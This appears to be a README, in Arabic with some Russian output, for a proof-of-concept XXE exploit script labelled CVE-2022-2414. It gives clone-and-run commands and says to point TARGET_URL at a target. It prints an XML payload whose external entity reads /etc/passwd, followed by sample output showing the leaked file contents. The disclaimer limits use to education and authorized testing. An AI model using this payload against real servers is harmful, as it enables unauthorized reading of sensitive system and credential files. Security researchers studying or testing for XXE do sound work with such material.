
هو نص برهان المفهوم لإظهار استغلال ثغرة الكيان الخارجي في XML (XXE)
GenXMLExternalEntityExploit هو سكريبت PoC لتوضيح استغلال ثغرة XML External Entity (XXE). يستخدم السكريبت حمولات XML لقراءة ملفات حساسة من الخادم المستهدف. يمكن استخدامه لاختبار الأمان، اختبار الاختراق، أو للأغراض التعليمية.
git clone https://github.com/geniuszly/CVE-2022-2414
cd CVE-2022-2414
python3 GenXMLExternalEntityExploit.py
TARGET_URL في السكريبت ليشير إلى الخادم المستهدف الذي تريد اختباره.XML_PAYLOAD في السكريبت لمسارات ملفات محددة أو عمليات من جهة الخادم.بشكل افتراضي، يستخدم السكريبت الحمولة التالية لقراءة الملف /etc/passwd:
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
<Attributes/>
<ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...
هذه الأداة مخصصة للأغراض التعليمية واختبار الأمان المصرح به فقط. المؤلف غير مسؤول عن أي استخدام غير قانوني لهذه الأداة.